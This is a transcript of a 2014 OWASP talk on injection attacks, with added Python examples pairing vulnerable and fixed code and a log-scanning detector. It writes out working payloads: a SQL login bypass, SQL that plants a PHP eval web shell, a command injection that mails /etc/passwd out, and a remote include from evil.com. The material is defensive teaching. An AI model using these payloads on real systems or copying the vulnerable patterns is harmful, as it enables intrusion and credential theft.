OWASP Top 10 A1: Injection
TRANSCRIPT
OWASP A1: Injection
25 Jan 2014: Dubai, UAE.
Michael Hendrickx, Information Security Consultant
OWASP Top 10 - 2013
• A1: Injection
• A2: Broken Authentication and Session Mgmt
• A3: Cross Site Scripting
• A4: Insecure Direct Object References
• A5: Security Misconfiguration
• A6: Sensitive Data Exposure
• A7: Missing Function Level Access Control
• A8: Cross Site Request Forgery
• A9: Using Components with Known Vulns
• A10: Unvalidated Redirects and Forwards
How bad is it?
• Oct ‘13: $100k stolen from a California ISP
  http://thehackernews.com/2013/10/hacker-stole-100000-from-users-of.html
• Jun ‘13: Hackers cleared Turkish people’s bills for water, gas, telephone…
  http://news.softpedia.com/news/RedHack-Breaches-Istanbul-Administration-Site-Hackers-Claim-to-Have-Erased-Debts-364000.shtml
• Nov ‘12: 150k Adobe user accounts stolen
  http://www.darkreading.com/attacks-breaches/adobe-hacker-says-he-used-sql-injection/240134996
• Jul ‘12: 450k Yahoo! user accounts stolen
  http://www.cbsnews.com/news/yahoo-reportedly-hacked-is-your-account-safe/
What is Injection?
• Web applications became more complex
  – Database driven
  – Extra functionality (email, ticket booking, ..)
• Submitted data can have a special meaning to the underlying technologies
• Types:
  – SQL Injection
  – XML Injection
  – Command Injection
[Diagram: Web → DB, OS, Backend System]
What underlying technologies?
• A webserver parses and “passes on” data
[Diagram: Web Server → DB, OS]
http://somesite.com/msg.php?id=8471350
The script performs the business logic and passes messages to the backend: “Hey, get me a message from the DB with id 8471350”
SQL Injection: Database Query
• Dynamic script to look up data in DB
[Diagram: Web Server → DB]
http://somesite.com/login.aspx?name=michael&password=secret123
SELECT * FROM users WHERE name = 'michael' AND password = 'secret123'
http://somesite.com/msg.php?id=8471350
SELECT * FROM messages WHERE id = 8471350
Get indirect access to the database
SQL Injection: Database Query
• Insert a value containing ' (single quote)
  – The single quote is the string delimiter in SQL queries
[Diagram: Web Server → DB]
http://somesite.com/login.php?login=mich'ael&password=secret123
SELECT * FROM users WHERE name = 'mich'ael' AND password = 'secret123'
The query is now syntactically incorrect and will throw an error (if errors are not suppressed).
SQL Injection: Database Query
• Insert a value containing ' (single quote)
[Diagram: Web Server → DB]
http://somesite.com/login.php?login=michael&password=test' OR 'a' = 'a
SELECT * FROM users WHERE name = 'michael' AND password = 'test' OR 'a' = 'a'
'a' always equals 'a', so the WHERE clause is true and this user is logged in.
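The login query from the last three slides, rebuilt against an in-memory SQLite table so the two ways of passing the parameters can be compared side by side. This is an added example, not code from the slides: the table, the single account and the function names are constructed for the demonstration. The string-concatenated function reproduces what the slides show (the quote-containing name produces a database error, the `test' OR 'a' = 'a` password logs in without the secret); the parameterised function sends both inputs as plain values, so neither input can change the query's structure.

```python
import sqlite3


def make_db():
    # Constructed sample data: one users table holding a single account.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('michael', 'secret123')")
    conn.commit()
    return conn


def login_concat(conn, name, password):
    # Vulnerable: the query text is assembled from the raw parameters,
    # exactly like the login.php example on the slides.
    sql = ("SELECT * FROM users WHERE name = '" + name +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_param(conn, name, password):
    # Safe: '?' placeholders send the values separately from the query text,
    # so a quote inside a value can never terminate the string literal.
    sql = "SELECT * FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchone() is not None


def concat_error(conn, name, password):
    # Returns the database error text the concatenated query produces, or None
    # when the query parsed. This is the error the slide says the user would see
    # unless error messages are suppressed.
    try:
        login_concat(conn, name, password)
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


if __name__ == "__main__":
    db = make_db()
    print("concat, mich'ael  ->", concat_error(db, "mich'ael", "secret123"))
    print("concat, OR 'a'='a ->", login_concat(db, "michael", "test' OR 'a' = 'a"))
    print("param,  OR 'a'='a ->", login_param(db, "michael", "test' OR 'a' = 'a"))
```

The parameterised form is what the slides later call a "prepared SQL statement"; every mainstream database driver offers an equivalent placeholder syntax, and it removes the need to escape quotes by hand.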
SQL Injection: Database Query
• “Direct” access to database
• Possible to issue CRUD statements, and more
http://xkcd.com/327/
SQL Injection: Database Query
• More advanced possibilities:
  – Read files*:
    • MySQL: SELECT HEX(LOAD_FILE('/var/www/site.com/admin/.htpasswd')) INTO DUMPFILE '/var/www/site.com/htdocs/test.txt';
    • MS SQL: CREATE TABLE newfile(data text); ... BULK INSERT newfile FROM 'C:\secretfile.dat' WITH (CODEPAGE='RAW', FIELDTERMINATOR='|', ROWTERMINATOR='---');
*: If you have the right privileges
SQL Injection: Database Query
• Write files*
  – MySQL:
    CREATE TABLE tmp(data longblob);
    INSERT INTO tmp(data) VALUES(0x3c3f7068);
    UPDATE tmp SET data=CONCAT(data, 0x20245f...);
    (the hex bytes spell out: <?php $_REQUEST[e] ? eval(base64_decode($_REQUEST[e])); exit;?>)
    ...
    SELECT data FROM tmp INTO DUMPFILE '/var/www/site.com/htdocs/test.php';
  – MS SQL: EXEC xp_cmdshell('echo ... >> backdoor.aspx');
*: Again, if you have the right privileges
SQL Injection: Database Query
• sqlmap will perform attacks on the target
• Dumps entire tables
• Even entire databases
• Stores everything in CSV
• More info on http://sqlmap.org
HTML Injection
• Possible to include HTML tags in fields
• Used to render “special” HTML tags where normal text is expected
• XSS possible, rewrite the DOM
HTML Injection
• Possible to insert iframes, fake forms, JS, …
• Can be used in phishing attacks
The button goes to a different form, potentially stealing credentials.
XML Injection
• Web app talks to backend web services
• Web app’s logic converts parameters to XML for the web services (as SOAP, …)
[Diagram: Web Server → Web service → DB, Backend]
XML Injection
Web app to create a new user:
http://somesite.com/create.php?name=michael&[email protected]
<?xml version="1.0" encoding="ISO-8859-1" ?>
<user>
  <status>new</status>
  <admin>false</admin>
  <date>25 Jan 2014, 13:10:01</date>
  <name>$name</name>
  <email>$email</email>
</user>
Injected request:
http://somesite.com/create.php?name=michael&[email protected]</email><admin>true</admin><email>[email protected]
Resulting XML:
<?xml version="1.0" encoding="ISO-8859-1" ?>
<user>
  <status>new</status>
  <admin>false</admin>
  <date>25 Jan 2014, 13:24:48</date>
  <name>michael</name>
  <email>[email protected]</email>
  <admin>true</admin>
  <email>[email protected]</email>
</user>
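The user-creation document above, built two ways in Python, as an added example that is not part of the slides (it also covers the HTML injection slides, since the fix is the same: escape text before placing it inside markup). The naive builder splices `$name` and `$email` into a template as the slide's script does, so the email value containing `</email><admin>true</admin><email>` yields a document with two `<admin>` elements. The safe builder lets the XML library write the element text, which turns `<` and `>` into entities; the backend then sees one `<admin>false</admin>` and an email field whose value is the whole string. The email address and the `render_comment_html` helper are constructed for the example; the `<date>` element is omitted for brevity.

```python
import html
import xml.etree.ElementTree as ET


def build_user_xml_naive(name, email):
    # Vulnerable: parameters are spliced into the template as text,
    # like the $name / $email substitution on the slide.
    return ("<user><status>new</status><admin>false</admin>"
            "<name>" + name + "</name><email>" + email + "</email></user>")


def build_user_xml_safe(name, email):
    # Safe: the library creates the elements and escapes the text content,
    # so a '<' inside a value becomes '&lt;' and can never open a new element.
    user = ET.Element("user")
    ET.SubElement(user, "status").text = "new"
    ET.SubElement(user, "admin").text = "false"
    ET.SubElement(user, "name").text = name
    ET.SubElement(user, "email").text = email
    return ET.tostring(user, encoding="unicode")


def admin_flags(xml_text):
    # Parse the document the way the backend service would and return the
    # value of every <admin> child; a correct document has exactly one.
    root = ET.fromstring(xml_text)
    return [el.text for el in root.findall("admin")]


def email_value(xml_text):
    # The first <email> value as the backend would read it.
    return ET.fromstring(xml_text).findtext("email")


def render_comment_html(text):
    # Same rule for HTML output (the HTML injection slides): escape user text
    # before placing it in the page so tags render as literal characters.
    return '<p class="comment">' + html.escape(text) + "</p>"


if __name__ == "__main__":
    # Constructed payload with the same shape as the slide's injected email.
    payload = "m@example.com</email><admin>true</admin><email>m@example.com"
    print("naive admin flags:", admin_flags(build_user_xml_naive("michael", payload)))
    print("safe  admin flags:", admin_flags(build_user_xml_safe("michael", payload)))
    print(render_comment_html("<b>not bold</b>"))
```

Escaping is the minimum; the backend should also reject documents that carry fields the client is not allowed to set (here `<admin>`), which is the least-privilege point made later in the deck.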
Command Injection
• Web application performs Operating System tasks
  – Execute external programs / scripts
  – List files
  – Send email
[Diagram: Web Server → OS]
Command Injection
• Dynamic script to share an article
[Diagram: Web Server → DB, OS]
http://somesite.com/[email protected]
$ echo "check this out" | mail -s "share" [email protected]
Injected request:
http://somesite.com/[email protected];[email protected]+<+/etc/passwd
$ echo "check this out" | mail -s "share" [email protected]; mail [email protected] < /etc/passwd
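The share script above, shown three ways in Python, as an added example that is not from the slides. The first function builds the single shell string the slide shows, so a `;` in the address starts a second command. The second keeps a shell string but quotes the parameter, which is the smallest fix when a shell is unavoidable. The third, the preferred form, validates the address against a format first and then builds an argument vector that `subprocess` executes without any shell, so the address is never parsed as command syntax. The address format, the helper names and the `argv_roundtrip` check (which runs a child Python instead of `mail`, so the demo does not depend on a mail command being installed) are constructed for the example.

```python
import re
import shlex
import subprocess
import sys

# Constructed: a deliberately strict address format; adapt to your own policy.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def share_command_unsafe(email):
    # Vulnerable: one shell string, as on the slide; a ';' in the parameter
    # ends the mail command and starts another.
    return 'echo "check this out" | mail -s "share" ' + email


def share_command_quoted(email):
    # Least change if a shell string is truly required: quote the parameter so
    # the shell sees it as a single word with no separators or redirections.
    return 'echo "check this out" | mail -s "share" ' + shlex.quote(email)


def share_argv_safe(email):
    # Preferred: validate the format, then build an argument vector. Passed to
    # subprocess.run without shell=True, the address is never seen by a shell.
    if not EMAIL_RE.match(email):
        raise ValueError("invalid e-mail address: %r" % email)
    return ["mail", "-s", "share", email]


def argv_roundtrip(value):
    # Shows that an argv element arrives verbatim at the child process: a child
    # Python simply prints sys.argv[1] back. Used here in place of 'mail'.
    out = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1], end='')", value],
        capture_output=True, text=True, check=True)
    return out.stdout


if __name__ == "__main__":
    # Constructed input with the same shape as the slide's injected address.
    bad = "x@example.com; echo injected"
    print("unsafe :", share_command_unsafe(bad))
    print("quoted :", share_command_quoted(bad))
    print("argv   :", repr(argv_roundtrip(bad)), "(one argument, nothing executed)")
    try:
        share_argv_safe(bad)
    except ValueError as exc:
        print("rejected:", exc)
```

To actually send the mail with the safe form, pipe the body in through `subprocess.run(share_argv_safe(addr), input=b"check this out\n")`; no shell is involved at any point.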
LDAP Injection
• Lightweight Directory Access Protocol
• LDAP is used to access information directories
  – Users
  – User information
  – Software
  – Computers
[Diagram: Web Server → LDAP Server]
LDAP Injection
• Insert special characters, such as (, |, &, *, …
• * (asterisk) allows listing of all users
http://www.networkdls.com/articles/ldapinjection.pdf
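A login filter built with and without value escaping, as an added example that is not from the slides. LDAP search filters have their own escaping rules (RFC 4515): inside an assertion value the characters `\`, `*`, `(`, `)` and NUL are written as `\5c`, `\2a`, `\28`, `\29` and `\00`. Once `(` and `)` are escaped a value cannot close the current assertion and append a new clause, so `|` and `&`, which only have meaning at the filter's structure level, need no escaping. The filter template and the `open_parens` structural check are constructed for the example.

```python
# RFC 4515 escapes for the characters that are special inside a filter value.
_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_filter_value(value):
    # Replace each special character by its backslash-hex form; everything
    # else is passed through unchanged.
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def login_filter_unsafe(username):
    # Vulnerable: the raw username becomes part of the filter text, so '*'
    # turns the lookup into a wildcard match (the "list all users" case).
    return "(&(objectClass=person)(uid=" + username + "))"


def login_filter_safe(username):
    # Safe: the same template, but the value is escaped first.
    return "(&(objectClass=person)(uid=" + escape_filter_value(username) + "))"


def open_parens(ldap_filter):
    # Structural sanity check: the template has exactly three '(' characters.
    # A value that smuggles in parentheses raises this count; an escaped
    # value never does.
    return ldap_filter.count("(")


if __name__ == "__main__":
    for user in ("michael", "*", "mich(ael)"):
        print(repr(user))
        print("  unsafe:", login_filter_unsafe(user), open_parens(login_filter_unsafe(user)))
        print("  safe  :", login_filter_safe(user), open_parens(login_filter_safe(user)))
```

In production use the escaping routine your LDAP client library ships rather than a hand-written table; python-ldap, for instance, provides `ldap.filter.escape_filter_chars` for filter values, and distinguished-name components need a different (RFC 4514) escaping again.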
Remote File Injection
• Scripts include other files to extend functionality
• Why? Clarity, reuse of functionality
  – PHP: include(), require(), require_once(), …
  – ASPX: <!-- #include "…" -->
  – JSP: <%@ include file="…" %>
Remote File Injection
• Color chooser
• The color parameter loads a file with the color codes (blue.php, red.php, …)
• Attacker can upload a malicious PHP file to an external server and point the parameter at it
http://somesite.com/mypage.php?color=blue
<?php if(isset($_GET['color'])){ include($_GET['color'].'.php'); }?>
http://somesite.com/mypage.php?color=http://evil.com/evil.txt?
Remote (HTML) File Injection
• Theme chooser
• Can input external HTML files
  – That can contain JavaScript, XSS, rewrite the DOM, etc...
• Also verify cookie contents, …
http://somesite.com/set_theme.php?theme=fancy
<link href="/themes/<? print $_COOKIE['theme'] ?>.css" rel="stylesheet" type="text/css" />
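The color chooser and the theme cookie from the last two slides share one fix: the parameter chooses a name from a fixed list, and the file path or markup is built from that name, never from the raw input. The Python below is an added example, not code from the slides; the site root, the allowlists and the default theme are constructed. `color_include_unsafe` mirrors the slide's `include($_GET['color'].'.php')`, so a URL is accepted as-is; `color_include_safe` returns a path only for a known name. `is_inside_root` is the second layer for the rarer case where a file name must be accepted: it normalises the path and checks that it still resolves under the web root. `theme_link_safe` shows the cookie being validated before it is echoed into the `<link>` tag.

```python
import posixpath

# Hypothetical site layout and allowlists (not from the slides).
SITE_ROOT = "/var/www/site.com/htdocs"
ALLOWED_COLORS = {"blue", "red", "green"}
ALLOWED_THEMES = {"fancy", "plain"}
DEFAULT_THEME = "plain"


def color_include_unsafe(color):
    # Mirrors include($_GET['color'].'.php'): whatever arrives is the path,
    # so a URL (remote include) or a traversal string is used unchanged.
    return color + ".php"


def color_include_safe(color):
    # Allowlist: the parameter selects one of a fixed set of names and the path
    # is built from that name, never from the raw input. None means "rejected".
    if color not in ALLOWED_COLORS:
        return None
    return posixpath.join(SITE_ROOT, "colors", color + ".php")


def is_inside_root(path, root=SITE_ROOT):
    # Second layer when a file name must be accepted: normalise and confirm the
    # result still lies under the web root. Absolute paths and '..' sequences
    # that escape the root both fail this test.
    full = posixpath.normpath(posixpath.join(root, path))
    return full == root or full.startswith(root + "/")


def theme_link_safe(theme_cookie):
    # The cookie is user input too (the slide's "also verify cookie contents"):
    # unknown values fall back to the default instead of being echoed into HTML.
    theme = theme_cookie if theme_cookie in ALLOWED_THEMES else DEFAULT_THEME
    return '<link href="/themes/%s.css" rel="stylesheet" type="text/css" />' % theme


if __name__ == "__main__":
    remote = "http://evil.com/evil.txt?"
    print("unsafe:", color_include_unsafe(remote))
    print("safe  :", color_include_safe(remote), "/", color_include_safe("blue"))
    print("root check:", is_inside_root("colors/blue.php"), is_inside_root("../../etc/passwd"))
    print(theme_link_safe("fancy"))
    print(theme_link_safe('"><b>'))
```

For PHP specifically, the allowlist should be paired with `allow_url_include=Off` in php.ini so that `include()` cannot fetch remote resources at all, whatever the application code does.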
Protect against Injection Attacks (1)
• Implement a Web Application Firewall (WAF)
• Prevents most common attacks
  – Not 100% foolproof
• Make sure it can decrypt SSL
[Diagram: WAF → Web Server → DB]
Protect against Injection Attacks (2)
• Validate user input, all input:
  – Never trust user input, ever.
  – Even stored input (for later use)
  – Force formats (numbers, email addresses, dates…)
  – HTTP form fields, HTTP referers, cookies, …
• Apply secure coding standards
  – Use prepared SQL statements
  – Vendor-specific guidelines
  – OWASP secure coding practices:
    https://www.owasp.org/images/0/08/OWASP_SCP_Quick_Reference_Guide_v2.pdf
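The "force formats" advice above as working code, added here as an example that is not from the slides. Each validator converts a raw string into a typed value or raises `ValueError`; `validate` applies one rule per expected parameter to a dictionary of raw strings, reports parameters that were expected but missing or present but not expected, and returns only the values that passed. The same function serves query strings, form fields, cookies and headers, which is the point of the slide's last sub-bullet. The formats (the email and name patterns, the integer range, the date layout) are constructed for the example and should be replaced by the ones your application actually needs.

```python
import re
from datetime import datetime

# Constructed formats: tighten or loosen to match the application's own rules.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")
NAME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9_-]{0,31}$")


def as_int(value, lo=0, hi=2 ** 31 - 1):
    # Digits only (no sign, no whitespace, no trailing SQL), then a range check.
    if not re.fullmatch(r"\d{1,10}", value):
        raise ValueError("not a number")
    n = int(value)
    if not lo <= n <= hi:
        raise ValueError("out of range")
    return n


def as_email(value):
    if len(value) > 254 or not EMAIL_RE.fullmatch(value):
        raise ValueError("not an e-mail address")
    return value


def as_date(value, fmt="%Y-%m-%d"):
    # strptime raises ValueError itself on anything that is not a valid date.
    return datetime.strptime(value, fmt).date()


def as_name(value):
    if not NAME_RE.fullmatch(value):
        raise ValueError("not a valid name")
    return value


def validate(params, rules):
    """Apply one rule per expected parameter to a dict of raw strings.

    Returns (clean, errors). A parameter is either converted by its rule or
    recorded in errors; parameters with no rule are reported as unexpected and
    never passed through, so the rest of the code only ever sees typed values.
    """
    clean, errors = {}, {}
    for key, rule in rules.items():
        raw = params.get(key)
        if raw is None:
            errors[key] = "missing"
            continue
        try:
            clean[key] = rule(raw)
        except ValueError as exc:
            errors[key] = str(exc)
    for key in params.keys() - rules.keys():
        errors[key] = "unexpected parameter"
    return clean, errors


if __name__ == "__main__":
    rules = {"id": as_int, "email": as_email, "date": as_date}
    print(validate({"id": "8471350", "email": "a@example.com", "date": "2014-01-25"}, rules))
    print(validate({"id": "8471350'", "date": "25 Jan 2014", "theme": "fancy"}, rules))
```

Validation narrows what reaches the interpreter but does not replace parameterised queries or output escaping; the deck's own advice is to do both.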
Protect against Injection Attacks (3)
• Adopt least-privilege policies
  – Give DB users least privileges
  – Use multiple DB users
  – Run processes with restricted privileges
  – Restrict permissions on directories
    • Do your web directories really need to be writable?
• Run in a sandboxed environment
• Suppress error messages
• Enable exception notifications
  – If something strange happens, reset the session and notify the administrator.
So what’s next?
• Don’t trust your user input.
• Don’t trust your user input.
• Adopt secure coding policies
• Implement defense in depth
• Do log analysis to detect anomalies
• And don’t trust your user input.
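A small illustration of the "log analysis to detect anomalies" point, added as an example that is not from the slides. It reads web-server access-log lines in the common format, decodes each query-string parameter the way the application would, and flags values that carry the syntax of an underlying interpreter (a quote followed by OR/AND, markup tags, shell separators, a bare LDAP wildcard, a URL where a file name is expected). The log lines are constructed to mirror the requests shown earlier in the deck; the rule set and the helper names are assumptions, and real deployments would feed the findings into whatever alerting the team already runs rather than print them.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx common-log style line; only the fields used here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Each rule names the interpreter syntax it looks for in a decoded value.
RULES = [
    ("sql-quote",      re.compile(r"'\s*(or|and)\b", re.I)),
    ("markup",         re.compile(r"</?[a-z]+", re.I)),
    ("shell-metachar", re.compile(r"[;|`$]")),
    ("ldap-wildcard",  re.compile(r"^\*$")),
    ("remote-include", re.compile(r"^[a-z]+://", re.I)),
]

# Constructed access-log lines modelled on the requests shown in the slides.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Jan/2014:13:10:01 +0400] "GET /msg.php?id=8471350 HTTP/1.1" 200 512
203.0.113.5 - - [25/Jan/2014:13:11:02 +0400] "GET /login.php?login=michael&password=test%27+OR+%27a%27+%3D+%27a HTTP/1.1" 200 87
198.51.100.7 - - [25/Jan/2014:13:12:03 +0400] "GET /share.php?email=x%40example.com%3Bmail+b%40example.com+%3C+%2Fetc%2Fpasswd HTTP/1.1" 500 0
198.51.100.7 - - [25/Jan/2014:13:13:04 +0400] "GET /mypage.php?color=http%3A%2F%2Fevil.com%2Fevil.txt%3F HTTP/1.1" 200 2048
192.0.2.9 - - [25/Jan/2014:13:14:05 +0400] "GET /create.php?name=michael&email=m%40example.com%3C%2Femail%3E%3Cadmin%3Etrue%3C%2Fadmin%3E HTTP/1.1" 200 300
192.0.2.9 - - [25/Jan/2014:13:15:06 +0400] "GET /msg.php?id=12 HTTP/1.1" 200 498
"""


def analyze_line(line):
    """Return (ip, path, param, rule) findings for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    findings = []
    # parse_qsl decodes %XX and '+', so the rules see what the application saw.
    for param, value in parse_qsl(url.query, keep_blank_values=True):
        for name, pattern in RULES:
            if pattern.search(value):
                findings.append((m.group("ip"), url.path, param, name))
    return findings


def scan(log_text):
    """Run analyze_line over every line and collect all findings."""
    findings = []
    for line in log_text.splitlines():
        findings.extend(analyze_line(line))
    return findings


def flagged_ips(findings):
    """Count findings per client IP; a threshold on this drives the alert."""
    counts = {}
    for ip, _path, _param, _rule in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for ip, path, param, rule in results:
        print("%-13s %-12s %-9s %s" % (ip, path, param, rule))
    print(flagged_ips(results))
```

Pattern rules like these produce false positives on legitimate text (a comment containing `<b>`, a surname with an apostrophe), so they are a starting point for triage and for rate-based alerting per client, not a blocking control; blocking belongs in the application's own validation and in the WAF discussed earlier.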